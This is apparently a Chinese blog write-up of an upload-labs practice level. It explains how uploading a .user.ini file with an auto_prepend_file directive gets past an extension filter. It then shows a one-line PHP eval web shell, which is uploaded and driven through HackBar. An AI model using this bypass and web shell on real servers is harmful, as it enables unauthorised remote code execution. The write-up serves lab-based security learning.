这一关，卡了好久，这里我的靶场的源代码，和我看别的师傅发的不一样，我的这里的源码带有小写转换：

是不能通过大小写进行绕过，最后找到这个师傅的文章：upload-labs通关-CSDN博客

这里第五关用到的方法，可以进行绕过，原理师傅讲的也很清晰，原理类似于之前的.htaccess绕过，通过添加配置文件。然后再上传一句话木马来进行实现：

就是将这里的代码：auto_prepend_file=1.txt

写进命名为.user.ini的文件中，然后上传这个文件，然后再上传命名为1.txt的文件。这时进入url为：upload-labs:8899/upload/readme.php

然后再使用hackbar来执行刚才上传的一句话木马，就是写进1.txt的一句话木马。

我这里的一句话木马为：<?php @eval($_POST['pw']); ?>